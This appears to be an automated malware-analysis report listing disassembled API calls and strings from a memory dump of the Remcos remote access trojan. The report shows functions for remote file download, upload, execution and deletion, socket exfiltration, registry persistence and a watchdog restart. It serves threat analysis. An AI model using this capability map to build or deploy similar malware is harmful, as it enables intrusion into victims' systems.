                                        • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                        • API String ID: 1698304352-2559757301
                                        • Opcode ID: d1b39ca36b1fd84df46e3bbf6e0ac8e81529882f0b644365a7a0582e2d7ac8c2
                                        • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                        • Opcode Fuzzy Hash: d1b39ca36b1fd84df46e3bbf6e0ac8e81529882f0b644365a7a0582e2d7ac8c2
                                        • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                        • SetEvent.KERNEL32(?), ref: 0040D2C5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040D2E8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • GetTickCount.KERNEL32 ref: 0040D33C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                        • atoi.MSVCRT ref: 0040D47B
                                        • Sleep.KERNEL32(00000064), ref: 0040DD60
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                        • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                        • String ID: $$PowrProf.dll$SetSuspendState
                                        • API String ID: 2465730144-1158640710
                                        • Opcode ID: a592643a0f67e9985d49c2e10944373042e1fa232a67b57bda9df140d502bff0
                                        • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                        • Opcode Fuzzy Hash: a592643a0f67e9985d49c2e10944373042e1fa232a67b57bda9df140d502bff0
                                        • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00404783
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000004,0041B310), ref: 004047A0
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 004047B3
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 004047C2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?,00000000,00000001,00000006), ref: 004047EB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,00000000,00000001,00000006), ref: 004047F5
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040481B
                                        • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 0040483B
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404849
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 00404853
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000006), ref: 0040485D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404883
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 0040488D
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404894
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004048A3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 004048C2
                                        • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 004048E8
                                        • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 004048F7
                                        • wcscmp.MSVCRT ref: 00404924
                                        • wcscmp.MSVCRT ref: 0040493C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A24), ref: 00404961
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00404973
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00404983
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404991
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040499D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049AC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004049BE
                                          • Part of subcall function 00404C0A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,76959F40), ref: 00404C1F
                                          • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(76902590,?,76959F40), ref: 00404C2F
                                          • Part of subcall function 00404C0A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C39
                                          • Part of subcall function 00404C0A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,76959F40), ref: 00404C43
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                          • Part of subcall function 00404C0A: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                          • Part of subcall function 00404C0A: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                          • Part of subcall function 00404C0A: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                          • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CCA
                                          • Part of subcall function 00404C0A: wcscmp.MSVCRT ref: 00404CE2
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                          • Part of subcall function 00404C0A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                          • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                          • Part of subcall function 00404C0A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                        • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 004049E5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00416FB8), ref: 004049F0
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404A0A
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00404A1C
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A29
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404A36
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404A51
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404A7E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404A88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404A94
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404AC0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404ACA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AF0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AFC
                                        • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 00404B1C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00416FB8,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B27
                                        • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404B39
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 00404B56
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404B60
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                          • Part of subcall function 00402440: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024FF
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404B81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404B99
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BA2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BAB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BB4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?), ref: 00404BBD
                                        • atoi.MSVCRT ref: 00404B88
                                          • Part of subcall function 00404EA7: _EH_prolog.MSVCRT ref: 00404EAC
                                          • Part of subcall function 00404EA7: closesocket.WS2_32(?), ref: 00404EEE
                                          • Part of subcall function 00404EA7: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 00404F00
                                        • _CxxThrowException.MSVCRT(00000000,00000000), ref: 00404BD6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,0041B320,00000010,00000000,00000001,00000006), ref: 00404BDE
                                        • atoi.MSVCRT ref: 00404BE5
                                        • FindClose.KERNEL32(?), ref: 00404BF6
                                        • ExitThread.KERNEL32 ref: 00404BFE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$G@std@@$D@2@@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@Hstd@@V?$basic_string@$V10@0@$?begin@?$basic_string@D@2@@0@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@$?data@?$basic_string@A?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$??4?$basic_string@?empty@?$basic_string@?find@?$basic_string@ExitTerminateV12@Y?$basic_string@closesocketconnectsocket
                                        • String ID:
                                        • API String ID: 338953085-0
                                        • Opcode ID: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                        • Instruction ID: 4b461097a1424462df126d137943af890334f3d1b741e30b480b936ae2585c0a
                                        • Opcode Fuzzy Hash: 64b6d24a099f49f87b4da525077f38fde3800b06bfc63a19b21d2caf8c47ce30
                                        • Instruction Fuzzy Hash: B4C14072800609EBCB11FFA0DC49ADE777CEB54345F0041AAF506A71A1EB745B85CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                          • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                          • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                          • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                        • OpenMutexA.KERNEL32 ref: 0040A63B
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.ADVAPI32(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.ADVAPI32(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
